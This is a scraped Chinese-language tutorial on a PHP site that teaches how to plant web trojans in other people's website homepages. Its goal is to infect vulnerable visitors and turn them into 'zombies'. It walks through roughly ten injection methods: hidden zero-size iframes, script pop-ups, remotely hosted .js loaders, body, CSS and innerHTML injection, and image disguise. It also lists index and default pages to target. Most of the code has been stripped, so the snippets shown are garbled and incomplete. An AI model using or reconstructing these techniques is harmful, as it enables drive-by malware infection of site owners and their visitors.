Heim  >  Artikel  >  php教程  >  网页挂马详细教程

网页挂马详细教程

WBOY
WBOYOriginal
2016-06-06 20:00:441803Durchsuche

其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。 下面我介绍5种方法,我一个一个介绍 方法一:这个就是最简单的了,只要你懂点html语言 把下面这段代码

其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。

下面我介绍5种方法,我一个一个介绍

方法一:这个就是最简单的了,只要你懂点html语言

把下面这段代码插进网页中:

我来插入,理论上来说插到任何地方都行,只是不要把html语言给弄乱了就行

本来没有插进去的页面就是这样,不知道网易那里有没有弹出的广告了,好我们运行,注意到网页的左下角的网址变化
看到左下角了吧,那里在请求www.163.com,说明我们插入进去的页面也运行了,哦,还有个弹出的窗口,给我的工具拦了,我来刷新一次,看到吧

width="0" height="0" frameborder="0"就是大小高度的意思,我们把他设置为零,那我们就不能看到网页的内容了

看下一种方法,把原来插进去的清理掉先,等下那个文件还要用


方法二:这个就是脚本



我们做网页的时候就会加入很多网页特效,同样我们也可以用来打开我们的网马,那么浏览过机子就会中我们的网马了~
学过java的都知道上面一段代码的意思了把!打开网站的同时也就打开了我们的http://www.xx.com/test.htm
看我们插进去
弹出的窗口给拦了,我去掉先,还是给拦了
晕,有个窗口弹了出来,这样子的网马是不保险的……不过也不失为一种方法
呃~改成0就更大的窗口了,好,方法而已,只是介绍,下一个

方法三:
还有一点就是比较隐蔽的那就是使用js文件


document.write("");
document.write("");

我们没必要挂两个网马,就写一个好了额
刚才写错位置了
保存为mm.js,然后在首页里调用js脚本

这个就是调用的代码,从这里我们可以看到http://xxxxxxx.net/mm.js,说明我们的mm.js文件可以不传到主机上,这样可以方便我们批量管理我们挂马,传到我们的主页空间上就可以了不过我这里就不传了,就用本地的吧,运行
左下角……调用了163的了,再刷新下,看清楚点,OK下一种方法

方法五:
再一种代码就是调用其他网页的页面文件,可以将下面的代码复制,保存为HTM文件。





    打开这个网页文件时显示的是index.htm的内容,而实际上还同时执行了help.htm的代码,大家可以对应
自己生成的木马页和想调用的网页来修改help.htm和index.htm,把它们改成你的文件名就可以了。
这个方法以前黑防的文章有,我就直讲运用了
我改代码换成其他的页面了,还是要注意页面的左下角,出错了,重来
看到左下角了吧,再刷新一次
看到了吧,只是太快就没了

再说下我们挂马的时候一般选取的页面
我们选取用来插马的页面一般是网站的首页
比如:index.htm、index.html、index.asp、index.aspx、index.php、index.cgi、index.jsp、default.htm、default.html default.asp default.aspx default.cgi default.jsp default.php等等,大家就自己记录下来吧,其他页面也可以插入,只要人家没有打上补丁

 

一:框架挂马

   

二:js文件挂马
  
    首先将以下代码
    document.write("");
    保存为xxx.js,
    则JS挂马代码为
   

三:js变形加密
  
   
    muma.txt可改成任意后缀
四:body挂马

   

五:隐蔽挂马

    top.document.body.innerHTML = top.document.body.innerHTML +     '/r/n';

六:css中挂马

    body {
    background-image: url('javascript:document.write("")')}

七:JAJA挂马

  

八:图片伪装

  
  
   网页挂马详细教程
  

九:伪装调用:

   


   
   
   

十:高级欺骗

    页面要显示的内容

 

Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Vorheriger Artikel:win7(64位)安装搭建phpNächster Artikel:线程